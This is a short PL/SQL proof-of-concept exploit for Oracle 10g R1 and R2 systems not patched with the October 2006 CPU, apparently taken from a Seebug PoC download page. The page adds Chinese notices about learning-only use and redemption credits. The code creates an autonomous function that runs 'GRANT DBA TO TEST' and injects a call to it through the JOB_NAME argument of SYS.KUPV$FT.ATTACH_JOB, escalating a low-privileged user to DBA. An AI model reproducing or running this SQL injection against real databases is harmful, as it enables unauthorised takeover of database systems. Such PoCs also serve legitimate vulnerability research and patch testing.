/** * Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 * Joxean Koret <joxeankoret@yahoo.es> * Privileges needed: * * - EXECUTE_CATALOG_ROLE * - CREATE PROCEDURE * */ select * from user_role_privs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; COMMIT; RETURN(1); END; / DECLARE USER_NAME VARCHAR2(200); JOB_NAME VARCHAR2(200); NEW_JOB BOOLEAN; v_Return NUMBER; BEGIN USER_NAME := 'OWNER'; JOB_NAME := ''' OR ' || USER || '.f1() = 1--'; v_Return := SYS.KUPV$FT.ATTACH_JOB( USER_NAME => USER_NAME, JOB_NAME => JOB_NAME, NEW_JOB => NEW_JOB ); END; /
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论